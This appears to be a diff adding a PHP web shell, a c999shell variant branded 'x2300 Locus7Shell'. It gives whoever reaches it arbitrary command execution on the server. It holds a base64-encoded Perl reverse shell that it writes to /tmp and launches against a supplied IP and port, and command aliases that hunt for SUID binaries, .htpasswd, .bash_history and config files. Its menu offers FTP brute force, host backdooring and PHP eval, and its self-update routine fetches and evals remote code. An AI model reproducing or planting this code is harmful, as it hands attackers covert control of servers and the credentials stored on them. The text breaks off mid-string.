+$_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+//if (file_exists("back.c")) { unlink("back.c"); }
+if (file_exists("backc")) { unlink("backc"); }
+}else{
+ex("chmod 777 /tmp/backc");
+cf("/tmp/backc",$back_connect_c);
+//$blah = ex("gcc -o /tmp/backc /tmp/back.c");
+$blah = ex("/tmp/backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+$_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+//if (file_exists("back.c")) { unlink("back.c"); }
+if (file_exists("/tmp/backc")) { unlink("/tmp/backc"); } }
+}
+
+function cf($fname,$text)
+{
+$w_file=@fopen($fname,"w") or err();
+if($w_file)
+{
+@fputs($w_file,@base64_decode($text));
+@fclose($w_file);
+}
+}
+
+function cfb($fname,$text)
+{
+$w_file=@fopen($fname,"w") or bberr();
+if($w_file)
+{
+@fputs($w_file,@base64_decode($text));
+@fclose($w_file);
+}
+}
+
+function err()
+{
+$_POST['backcconnmsge']="</br></br><b><font color=red size=3>Error:</font> Can't connect!</b>";
+}
+
+function bberr()
+{
+$_POST['backcconnmsge']="</br></br><b><font color=red size=3>Error:</font> Can't backdoor host!</b>";
+}
+
+function which($pr)
+{
+$path = ex("which $pr");
+if(!empty($path)) { return $path; } else { return $pr; }
+}
+function ex($cfe)
+{
+$res = '';
+if (!empty($cfe))
+{
+  if(function_exists('exec'))
+   {
+    @exec($cfe,$res);
+    $res = join("\n",$res);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    $res = @shell_exec($cfe);
+   }
+  elseif(function_exists('system'))
+   {
+    @ob_start();
+    @system($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(function_exists('passthru'))
+   {
+    @ob_start();
+    @passthru($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(@is_resource($f = @popen($cfe,"r")))
+  {
+   $res = "";
+   while(!@feof($f)) { $res .= @fread($f,1024); }
+   @pclose($f);
+  }
+}
+return $res;
+}
+//EoW
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+//Start Enumerate function
+//function ENUMERATE()
+
+$hostname_x=php_uname(n);
+$itshome = getcwd();
+$itshome = str_replace("/home/","~",$itshome);
+$itshome = str_replace("/public_html","/x2300.php",$itshome);
+$enumerate = "http://".$hostname_x."/".$itshome."";
+
+//End Enumerate function
+
+//Starting calls
+ini_set("max_execution_time",0);
+if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
+error_reporting(5);
+$adires="";
+@ignore_user_abort(TRUE);
+@set_magic_quotes_runtime(0);
+$win = strtolower(substr(PHP_OS,0,3)) == "win";
+define("starttime",getmicrotime());
+if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}
+$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
+foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}
+
+$shver = "1.0a beta"; //Current version
+//CONFIGURATION AND SETTINGS
+if (!empty($unset_surl)) {setcookie("c999sh_surl"); $surl = "";}
+elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c999sh_surl",$surl);}
+else {$surl = $_REQUEST["c999sh_surl"]; //Set this cookie for manual SURL
+}
+
+$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL.
+
+if ($surl_autofill_include and !$_REQUEST["c999sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
+if (empty($surl))
+{
+$surl = "?".$includestr; //Self url
+}
+$surl = htmlspecialchars($surl);
+
+$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited.
+
+//Authentication
+$login = ""; //login
+//DON'T FORGOT ABOUT PASSWORD!!!
+$pass = ""; //password
+$md5_pass = ""; //md5-cryped pass. if null, md5($pass)
+
+$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1")
+$login_txt = "Restricted area"; //http-auth message.
+$accessdeniedmess = "<a href=\"http://ALTURKS.COM\">x2300 Locus7Shell v.".$shver."</a>: access denied";
+
+$gzipencode = TRUE; //Encode with gzip?
+
+$updatenow = FALSE; //If TRUE, update now (this variable will be FALSE)
+
+$c999sh_updateurl = "http://ALTURKS.COM/files/lshell_update/"; //Update server
+$c999sh_sourcesurl = "http://ALTURKS.COM/"; //Sources-server
+
+$filestealth = TRUE; //if TRUE, don't change modify- and access-time
+
+$donated_html = "<center><b>x2300 Locus7Shell - Edited By KingDefacer</b></center>";
+/* If you publish free shell and you wish
+add link to your site or any other information,
+put here your html. */
+$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html.
+
+$curdir = "./"; //start folder
+//$curdir = getenv("DOCUMENT_ROOT");
+$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp)
+$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...)
+
+$log_email = "user@host.tld"; //Default e-mail for sending logs
+
+$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending
+$sort_save = TRUE; //If TRUE then save sorting-position using cookies.
+
+// Registered file-types.
+//  array(
+//   "{action1}"=>array("ext1","ext2","ext3",...),
+//   "{action2}"=>array("ext4","ext5","ext6",...),
+//   ...
+//  )
+$ftypes  = array(
+"html"=>array("html","htm","shtml"),
+"txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
+"exe"=>array("sh","install","bat","cmd"),
+"ini"=>array("ini","inf"),
+"code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
+"img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
+"sdb"=>array("sdb"),
+"phpsess"=>array("sess"),
+"download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
+);
+
+// Registered executable file-types.
+//  array(
+//   string "command{i}"=>array("ext1","ext2","ext3",...),
+//   ...
+//  )
+//   {command}: %f% = filename
+$dizin = str_replace("\\",DIRECTORY_SEPARATOR,$dizin);
+if (empty($dizin)) {$dizin = realpath(".");} elseif(realpath($dizin)) {$dizin = realpath($dizin);}
+$dizin = str_replace("\\",DIRECTORY_SEPARATOR,$dizin);
+if (substr($dizin,-1) != DIRECTORY_SEPARATOR) {$dizin .= DIRECTORY_SEPARATOR;}
+$dizin = str_replace("\\\\","\\",$dizin);
+$dizinispd = htmlspecialchars($dizin);
+/*dizin*/
+$real = realpath($dizinispd);
+$path = basename ($PHP_SELF);
+function dosyayicek($link,$file)
+{
+   $fp = @fopen($link,"r");
+   while(!feof($fp))
+   {
+       $cont.= fread($fp,1024);
+   }
+   fclose($fp);
+
+   $fp2 = @fopen($file,"w");
+   fwrite($fp2,$cont);
+   fclose($fp2);
+}
+
+
+
+
+$exeftypes  = array(
+getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
+"perl %f%" => array("pl","cgi")
+);
+
+/* Highlighted files.
+  array(
+   i=>array({regexp},{type},{opentag},{closetag},{break})
+   ...
+  )
+  string {regexp} - regular exp.
+  int {type}:
+0 - files and folders (as default),
+1 - files only, 2 - folders only
+  string {opentag} - open html-tag, e.g. "<b>" (default)
+  string {closetag} - close html-tag, e.g. "</b>" (default)
+  bool {break} - if TRUE and found match then break
+*/
+$regxp_highlight  = array(
+  array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example
+  array("config.php",1) // example
+);
+
+$safemode_diskettes = array("a"); // This variable for disabling diskett-errors.
+// array (i=>{letter} ...); string {letter} - letter of a drive
+//$safemode_diskettes = range("a","z");
+$hexdump_lines = 8;// lines in hex preview file
+$hexdump_rows = 24;// 16, 24 or 32 bytes in one line
+
+$nixpwdperpage = 100; // Get first N lines from /etc/passwd
+
+$bindport_pass = "c999";  // default password for binding
+$bindport_port = "31373"; // default port for binding
+$bc_port = "31373"; // default port for back-connect
+$datapipe_localport = "8081"; // default port for datapipe
+$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
+aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
+hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
+sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
+kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
+KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
+OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+
+// Command-aliases
+if (!$win)
+{
+$cmdaliases = array(
+  array("-----------------------------------------------------------", "ls -la"),
+  array("find all suid files", "find / -type f -perm -04000 -ls"),
+  array("find suid files in current dir", "find . -type f -perm -04000 -ls"),
+  array("find all sgid files", "find / -type f -perm -02000 -ls"),
+  array("find sgid files in current dir", "find . -type f -perm -02000 -ls"),
+  array("find config.inc.php files", "find / -type f -name config.inc.php"),
+  array("find config* files", "find / -type f -name \"config*\""),
+  array("find config* files in current dir", "find . -type f -name \"config*\""),
+  array("find all writable folders and files", "find / -perm -2 -ls"),
+  array("find all writable folders and files in current dir", "find . -perm -2 -ls"),
+  array("find all service.pwd files", "find / -type f -name service.pwd"),
+  array("find service.pwd files in current dir", "find . -type f -name service.pwd"),
+  array("find all .htpasswd files", "find / -type f -name .htpasswd"),
+  array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
+  array("find all .bash_history files", "find / -type f -name .bash_history"),
+  array("find .bash_history files in current dir", "find . -type f -name .bash_history"),
+  array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
+
+  array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
+  array("list file attributes on a Linux second extended file system", "lsattr -va"),
+  array("show opened ports", "netstat -an | grep -i listen")
+);
+}
+else
+{
+$cmdaliases = array(
+  array("-----------------------------------------------------------", "dir"),
+  array("show opened ports", "netstat -an")
+);
+}
+
+$sess_cookie = "c999shvars"; // Cookie-variable name
+
+$usefsbuff = TRUE; //Buffer-function
+$copy_unset = FALSE; //Remove copied files from buffer after pasting
+
+//Quick launch
+$quicklaunch = array(
+array("<img src=\"".$surl."act=img&img=home\" alt=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl),
+array("<img src=\"".$surl."act=img&img=back\" alt=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)"),
+array("<img src=\"".$surl."act=img&img=forward\" alt=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)"),
+array("<img src=\"".$surl."act=img&img=up\" alt=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"),
+array("<img src=\"".$surl."act=img&img=refresh\" alt=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">",""),
+array("<img src=\"".$surl."act=img&img=search\" alt=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d"),
+array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d"),
+array("<br><center><b>[Enumerate]</b>",$enumerate),
+array("<b>[Encoder]</b>",$surl."act=encoder&d=%d"),
+array("<b>[Tools]</b>",$surl."act=tools&d=%d"),
+array("<b>[Proc.]</b>",$surl."act=processes&d=%d"),
+array("<b>[FTP Brute]</b>",$surl."act=ftpquickbrute&d=%d"),
+array("<b>[Sec.]</b>",$surl."act=security&d=%d"),
+array("<b>[SQL]</b>",$surl."act=sql&d=%d"),
+array("<b>[PHP-Code]</b>",$surl."act=eval&d=%d"),
+array("<b>[Backdoor Host]</b>",$surl."act=shbd"),
+array("<b>[Back-Connection]</b>",$surl."act=backc"),
+array("<b>[milw0rm it!]</b>",$millink),
+array("<b>[PHP-Proxy]</b>",$phprox),
+array("<b>[Self remove]</b></center>",$surl."act=selfremove")
+);
+
+//Highlight-code colors
+$highlight_background = "#c0c0c0";
+$highlight_bg = "#FFFFFF";
+$highlight_comment = "#6A6A6A";
+$highlight_default = "#0000BB";
+$highlight_html = "#1300FF";
+$highlight_keyword = "#007700";
+$highlight_string = "#000000";
+
+@$f = $_REQUEST["f"];
+@extract($_REQUEST["c999shcook"]);
+
+//END CONFIGURATION
+
+
+// \/Next code isn't for editing\/
+/*function ex($cfe)
+{
+$res = '';
+if (!empty($cfe))
+{
+  if(function_exists('exec'))
+   {
+    @exec($cfe,$res);
+    $res = join("\n",$res);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    $res = @shell_exec($cfe);
+   }
+  elseif(function_exists('system'))
+   {
+    @ob_start();
+    @system($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(function_exists('passthru'))
+   {
+    @ob_start();
+    @passthru($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(@is_resource($f = @popen($cfe,"r")))
+  {
+   $res = "";
+   while(!@feof($f)) { $res .= @fread($f,1024); }
+   @pclose($f);
+  }
+}
+return $res;
+}*/
+/*function which($pr)
+{
+$path = ex("which $pr");
+if(!empty($path)) { return $path; } else { return $pr; }
+}
+
+function cf($fname,$text)
+{
+$w_file=@fopen($fname,"w") or err(0);
+if($w_file)
+{
+@fputs($w_file,@base64_decode($text));
+@fclose($w_file);
+}
+}*/
+/*function err($n,$txt='')
+{
+echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#000000><font color=red face=Verdana size=-2><div align=center><b>';     
+echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n];
+if(!empty($txt)) { echo " $txt"; }
+echo '</b></div></font></td></tr></table>';
+return null;
+}*/
+@set_time_limit(0);
+$tmp = array();
+foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));}
+$s = "!^(".implode("|",$tmp).")$!i";
+if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://ALTURKS.COM/\">x2300 Shell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");}
+if (!empty($login))
+{
+if (empty($md5_pass)) {$md5_pass = md5($pass);}
+if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass))
+{
+  if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));}
+  header("WWW-Authenticate: Basic realm=\"c999shell ".$shver.": ".$login_txt."\"");
+  header("HTTP/1.0 401 Unauthorized");
+  exit($accessdeniedmess);
+}
+}
+if ($act != "img")
+{
+$lastdir = realpath(".");
+chdir($curdir);
+if ($selfwrite or $updatenow) {@ob_clean(); c999sh_getupdate($selfwrite,1); exit;}
+$sess_data = unserialize($_COOKIE["$sess_cookie"]);
+if (!is_array($sess_data)) {$sess_data = array();}
+if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
+if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
+
+$disablefunc = @ini_get("disable_functions");
+if (!empty($disablefunc))
+{
+$disablefunc = str_replace(" ","",$disablefunc);
+$disablefunc = explode(",",$disablefunc);
+}
+
+if (!function_exists("c999_buff_prepare"))
+{
+function c999_buff_prepare()
+{
+global $sess_data;
+global $act;
+foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
+foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
+$sess_data["copy"] = array_unique($sess_data["copy"]);
+$sess_data["cut"] = array_unique($sess_data["cut"]);
+sort($sess_data["copy"]);
+sort($sess_data["cut"]);
+if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}
+else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}
+}
+}
+c999_buff_prepare();
+
+if (!function_exists("c999_sess_put"))
+{
+function c999_sess_put($data)
+{
+global $sess_cookie;
+global $sess_data;
+c999_buff_prepare();
+$sess_data = $data;
+$data = serialize($data);
+setcookie($sess_cookie,$data);
+}
+}
+foreach (array("sort","sql_sort") as $v)
+{
+if (!empty($_GET[$v])) {$$v = $_GET[$v];}
+if (!empty($_POST[$v])) {$$v = $_POST[$v];}
+}
+if ($sort_save)
+{
+if (!empty($sort)) {setcookie("sort",$sort);}
+if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
+}
+if (!function_exists("str2mini"))
+{
+function str2mini($content,$len)
+{
+if (strlen($content) > $len)
+{
+  $len = ceil($len/2) - 2;
+  return substr($content, 0,$len)."...".substr($content,-$len);
+}
+else {return $content;}
+}
+}
+if (!function_exists("view_size"))
+{
+function view_size($size)
+{
+if (!is_numeric($size)) {return FALSE;}
+else
+{
+  if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
+  elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
+  elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
+  else {$size = $size . " B";}
+  return $size;
+}
+}
+}
+if (!function_exists("fs_copy_dir"))
+{
+function fs_copy_dir($d,$t)
+{
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+$h = opendir($d);
+while (($o = readdir($h)) !== FALSE)
+{
+  if (($o != ".") and ($o != ".."))
+  {
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   if (!$ret) {return $ret;}
+  }
+}
+closedir($h);
+return TRUE;
+}
+}
+if (!function_exists("fs_copy_obj"))
+{
+function fs_copy_obj($d,$t)
+{
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+$t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+if (!is_dir(dirname($t))) {mkdir(dirname($t));}
+if (is_dir($d))
+{
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
+  return fs_copy_dir($d,$t);
+}
+elseif (is_file($d)) {return copy($d,$t);}
+else {return FALSE;}
+}
+}
+if (!function_exists("fs_move_dir"))
+{
+function fs_move_dir($d,$t)
+{
+$h = opendir($d);
+if (!is_dir($t)) {mkdir($t);}
+while (($o = readdir($h)) !== FALSE)
+{
+  if (($o != ".") and ($o != ".."))
+  {
+   $ret = TRUE;
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}}
+   if (!$ret) {return $ret;}
+  }
+}
+closedir($h);
+return TRUE;
+}
+}
+if (!function_exists("fs_move_obj"))
+{
+function fs_move_obj($d,$t)
+{
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+$t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+if (is_dir($d))
+{
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
+  return fs_move_dir($d,$t);
+}
+elseif (is_file($d))
+{
+  if(copy($d,$t)) {return unlink($d);}
+  else {unlink($t); return FALSE;}
+}
+else {return FALSE;}
+}
+}
+if (!function_exists("fs_rmdir"))
+{
+function fs_rmdir($d)
+{
+$h = opendir($d);
+while (($o = readdir($h)) !== FALSE)
+{
+  if (($o != ".") and ($o != ".."))
+  {
+   if (!is_dir($d.$o)) {unlink($d.$o);}
+   else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
+  }
+}
+closedir($h);
+rmdir($d);
+return !is_dir($d);
+}
+}
+if (!function_exists("fs_rmobj"))
+{
+function fs_rmobj($o)
+{
+$o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
+if (is_dir($o))
+{
+  if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
+  return fs_rmdir($o);
+}
+elseif (is_file($o)) {return unlink($o);}
+else {return FALSE;}
+}
+}
+if (!function_exists("myshellexec"))
+{
+function myshellexec($cmd)
+{
+global $disablefunc;
+$result = "";
+if (!empty($cmd))
+{
+  if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
+  elseif (($result = `$cmd`) !== FALSE) {}
+  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+  elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+  elseif (is_resource($fp = popen($cmd,"r")))
+  {
+   $result = "";
+   while(!feof($fp)) {$result .= fread($fp,1024);}
+   pclose($fp);
+  }
+}
+return $result;
+}
+}
+if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}}
+if (!function_exists("view_perms"))
+{
+function view_perms($mode)
+{
+if (($mode & 0xC000) === 0xC000) {$type = "s";}
+elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
+elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
+elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
+elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
+elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
+elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
+else {$type = "?";}
+
+$owner["read"] = ($mode & 00400)?"r":"-";
+$owner["write"] = ($mode & 00200)?"w":"-";
+$owner["execute"] = ($mode & 00100)?"x":"-";
+$group["read"] = ($mode & 00040)?"r":"-";
+$group["write"] = ($mode & 00020)?"w":"-";
+$group["execute"] = ($mode & 00010)?"x":"-";
+$world["read"] = ($mode & 00004)?"r":"-";
+$world["write"] = ($mode & 00002)? "w":"-";
+$world["execute"] = ($mode & 00001)?"x":"-";
+
+if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
+if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
+if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
+
+return $type.join("",$owner).join("",$group).join("",$world);
+}
+}
+if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}}
+if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}}
+if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}}
+if (!function_exists("parse_perms"))
+{
+function parse_perms($mode)
+{
+if (($mode & 0xC000) === 0xC000) {$t = "s";}
+elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
+elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
+elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
+elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
+elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
+elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
+else {$t = "?";}
+$o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
+$g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
+$w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
+return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
+}
+}
+if (!function_exists("parsesort"))
+{
+function parsesort($sort)
+{
+$one = intval($sort);
+$second = substr($sort,-1);
+if ($second != "d") {$second = "a";}
+return array($one,$second);
+}
+}
+if (!function_exists("view_perms_color"))
+{
+function view_perms_color($o)
+{
+if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}
+elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";}
+else {return "<font color=green>".view_perms(fileperms($o))."</font>";}
+}
+}
+if (!function_exists("c999getsource"))
+{
+function c999getsource($fn)
+{
+global $c999sh_sourcesurl;
+$array = array(
+  "c999sh_bindport.pl" => "c999sh_bindport_pl.txt",
+  "c999sh_bindport.c" => "c999sh_bindport_c.txt",
+  "c999sh_backconn.pl" => "c999sh_backconn_pl.txt",
+  "c999sh_backconn.c" => "c999sh_backconn_c.txt",
+  "c999sh_datapipe.pl" => "c999sh_datapipe_pl.txt",
+  "c999sh_datapipe.c" => "c999sh_datapipe_c.txt",
+);
+$name = $array[$fn];
+if ($name) {return file_get_contents($c999sh_sourcesurl.$name);}
+else {return FALSE;}
+}
+}
+if (!function_exists("c999sh_getupdate"))
+{
+function c999sh_getupdate($update = TRUE)
+{
+$url = $GLOBALS["c999sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&";
+$data = @file_get_contents($url);
+if (!$data) {return "Can't connect to update-server!";}
+else
+{
+  $data = ltrim($data);
+  $string = substr($data,3,ord($data{2}));
+  if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;}
+  if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";}
+  if ($data{0} == "\x99" and $data{1} == "\x03")
+  {
+   $string = explode("\x01",$string);
+   if ($update)
+   {
+    $confvars = array();
+    $sourceurl = $string[0];
+    $source = file_get_contents($sourceurl);
+    if (!$source) {return "Can't fetch update!";}
+    else
+    {
+     $fp = fopen(__FILE__,"w");
+     if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download c999shell.php manually <a href=\"".$sourceurl."\"><u>here</u></a>.";}
+     else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";}
+    }
+   }
+   else {return "New version are available: ".$string[1];}
+  }
+  elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;}
+  else {return "Error in protocol: segmentation failed! (".$data.") ";}
+}
+}
+}
+if (!function_exists("mysql_dump"))
+{
+function mysql_dump($set)
+{
+global $shver;
+$sock = $set["sock"];
+$db = $set["db"];
+$print = $set["print"];
+$nl2br = $set["nl2br"];
+$file = $set["file"];
+$add_drop = $set["add_drop"];
+$tabs = $set["tabs"];
+$onlytabs = $set["onlytabs"];
+$ret = array();
+$ret["err"] = array();
+if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
+if (empty($db)) {$db = "db";}
+if (empty($print)) {$print = 0;}
+if (empty($nl2br)) {$nl2br = 0;}
+if (empty($add_drop)) {$add_drop = TRUE;}
+if (empty($file))
+{
+  $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
+}
+if (!is_array($tabs)) {$tabs = array();}
+if (empty($add_drop)) {$add_drop = TRUE;}
+if (sizeof($tabs) == 0)
+{
+  // retrive tables-list
+  $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
+  if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
+}
+$out = "# Dumped by Locous7Shell.SQL v. ".$shver."
+# Home page: http://www.ALTURKS.COM
+#
+# Host settings:
